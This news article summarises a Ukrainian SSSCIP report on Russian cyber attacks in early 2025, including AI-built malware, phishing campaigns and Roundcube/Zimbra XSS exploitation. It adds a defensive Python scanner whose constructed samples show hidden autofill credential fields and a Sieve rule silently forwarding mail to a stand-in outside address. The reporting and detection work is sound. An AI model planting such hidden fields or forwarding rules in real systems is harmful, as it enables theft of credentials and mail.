Russian hackers have taken their cyber offensive to a new level by integrating artificial intelligence (AI) into cyber attacks against Ukraine, according to a report published by the State Service for Special Communications and Information Protection of Ukraine (SSSCIP).
The report revealed that during the first half of 2025 (H1 2025), hackers began using AI not only to craft sophisticated phishing emails but also to develop new strains of malware.
“Some malware samples analyzed by our experts clearly show signs of being AI-generated, and it’s evident that cyber attackers are not planning to stop here,” said SSSCIP in its report released on Wednesday.
Rising Number of Cyber Incidents
According to SSSCIP, Ukraine recorded 3,018 cyber incidents in H1 2025, an increase from 2,575 attacks documented in the second half of 2024 (H2 2024). While attacks on local governments and military entities surged, those aimed at national government institutions and energy companies slightly declined.
AI-Driven Malware Campaigns
One of the most notable attacks involved the hacking group UAC-0219, which deployed a malware known as WRECKSTEEL against state administration bodies and critical infrastructure. Investigators believe the PowerShell-based data-stealing malware was built using AI development tools.
Other major phishing operations identified during the same period include:
- UAC-0218: Launched phishing campaigns targeting defense forces, delivering HOMESTEEL via infected RAR archives.
- UAC-0226: Focused on defense technology developers, local administrations, military units, and law enforcement, spreading GIFTEDCROOK stealer.
- UAC-0227: Targeted local authorities and infrastructure entities, using ClickFix-style phishing and malicious SVG files to deliver Amatera Stealer and Strela Stealer.
- UAC-0125 (linked to Sandworm): Masqueraded as ESET by sending emails that redirected users to a fake security website delivering a C#-based backdoor named Kalambur (aka SUMBUR) disguised as a threat removal utility.
Exploiting Zero-Day Vulnerabilities
SSSCIP also confirmed that APT28 (UAC-0001), a well-known Russian threat group, exploited cross-site scripting (XSS) vulnerabilities in Roundcube and Zimbra webmail software. These attacks took advantage of CVE-2023-43770, CVE-2024-37383, CVE-2025-49113 (Roundcube) and CVE-2024-27443, CVE-2025-27915 (Zimbra).
The attackers injected malicious code through APIs to gain unauthorized access to user credentials, contact lists, and email filters, automatically forwarding messages to their own mailboxes.
In some cases, hackers created hidden HTML input fields with the attribute autocomplete="on", tricking browsers into auto-filling saved login data into fields the user could not see, which was then stolen.
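The two post-exploitation artefacts described above (mail filters that silently forward messages to an outside mailbox, and visually hidden input fields left eligible for browser autofill) can both be checked for after an incident. The following is an added example written for this article, not tooling from SSSCIP, Roundcube or Zimbra: it scans a page of webmail HTML for hidden, credential-like inputs that still allow autofill, and scans a Sieve filter script (the syntax used by Roundcube's managesieve plugin and by Zimbra's filters) for redirect rules pointing outside the organisation's domain. The hidden-field heuristics, the sample HTML, the sample Sieve script and the domains are all constructed assumptions.

```python
"""Defender-side checks for two artefacts from the SSSCIP report.

Added example; not code from SSSCIP or any webmail project. The visibility
heuristics below are assumptions, and every sample input is constructed.
"""
import re
from html.parser import HTMLParser

# CSS patterns that make an element invisible or push it off-screen (assumed heuristic).
_HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])|"
    r"(?:left|top)\s*:\s*-\d{3,}px|(?:width|height)\s*:\s*0(?:px)?\s*(?:;|$)",
    re.I,
)
# Field names that suggest a credential or address is being harvested (assumed heuristic).
_CREDENTIAL_FIELDS = re.compile(r"pass|pwd|user|login|email|mail", re.I)
# Void elements have no closing tag, so they must not be pushed on the nesting stack.
_VOID = {"input", "br", "img", "meta", "link", "hr", "area", "base", "col", "embed", "source", "track", "wbr"}


class HiddenAutofillScanner(HTMLParser):
    """Report <input> elements that are hidden (directly or via an ancestor) but still autofillable."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._stack = []        # one bool per open ancestor: is it hidden?
        self._hidden_depth = 0  # how many open ancestors are hidden

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        is_hidden = "hidden" in a or bool(_HIDDEN_STYLE.search(a.get("style", "")))
        if tag == "input":
            self._check_input(a, is_hidden or self._hidden_depth > 0)
            return
        if tag in _VOID:
            return
        self._stack.append(is_hidden)
        if is_hidden:
            self._hidden_depth += 1

    def handle_endtag(self, tag):
        if tag in _VOID or not self._stack:
            return
        if self._stack.pop():
            self._hidden_depth -= 1

    def _check_input(self, a, hidden):
        itype = a.get("type", "text").lower()
        if itype == "hidden":
            hidden = True
        # autocomplete defaults to "on"; only an explicit "off" opts the field out.
        autocomplete_on = a.get("autocomplete", "on").lower() != "off"
        credential_like = itype in ("password", "email") or bool(
            _CREDENTIAL_FIELDS.search(a.get("name", "") + " " + a.get("id", ""))
        )
        if hidden and autocomplete_on and credential_like:
            self.findings.append({"name": a.get("name", ""), "type": itype, "line": self.getpos()[0]})


def scan_html(html):
    """Return the hidden-but-autofillable credential fields found in an HTML document."""
    parser = HiddenAutofillScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


# Sieve "redirect" actions forward a copy of (or the whole) message to another address.
_REDIRECT = re.compile(r'\bredirect\s+(?::copy\s+)?"([^"]+)"', re.I)


def external_forwards(sieve_script, org_domain):
    """Return redirect targets whose domain is not the organisation's own (or a subdomain of it)."""
    org = org_domain.lower()
    external = []
    for match in _REDIRECT.finditer(sieve_script):
        address = match.group(1)
        domain = address.rsplit("@", 1)[-1].lower()
        if domain != org and not domain.endswith("." + org):
            external.append(address)
    return external


# Constructed sample: a search box plus credential fields hidden by CSS or moved off-screen.
SAMPLE_HTML = """
<form action="/mail/">
  <input type="text" name="q" placeholder="Search mail">
  <div style="display:none">
    <input type="text" name="username" autocomplete="on">
    <input type="password" name="password" autocomplete="on">
  </div>
  <input type="email" name="contact" style="position:absolute;left:-9999px" autocomplete="on">
</form>
"""

# Constructed sample of a filter script after an attacker added a silent forward.
SAMPLE_SIEVE = """require ["fileinto", "copy"];
if header :contains "subject" "invoice" { fileinto "Finance"; }
redirect :copy "collector@example.net";
"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"hidden autofillable field: name={f['name']!r} type={f['type']} line={f['line']}")
    for addr in external_forwards(SAMPLE_SIEVE, "example.org"):
        print(f"external forward target: {addr}")
```

Run against a dump of a user's filter script and the webmail login or settings page after an XSS incident, the two functions give a quick first pass; the real rule store on the server (and the browser's own list of saved credentials) remains the authoritative place to confirm what was changed or leaked.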
Hybrid Warfare Strategy
The report emphasized that Russia continues to execute hybrid warfare, combining cyber operations with physical assaults on the battlefield. The notorious Sandworm group (UAC-0002) remains active, primarily targeting Ukraine’s energy, defense, ISP, and research sectors.
Use of Legitimate Services in Cyber Operations
Another concerning trend is the abuse of legitimate online services by Russian threat actors. Platforms such as Dropbox, Google Drive, OneDrive, Bitbucket, Cloudflare Workers, Telegram, Telegra.ph, Teletype.in, Firebase, ipfs.io, and mocky.io are being repurposed to host malware and phishing pages and to exfiltrate stolen data.
“The use of legitimate services for malicious activity isn’t new,” said SSSCIP. “However, the number of platforms exploited by Russian hackers has grown significantly in recent months.”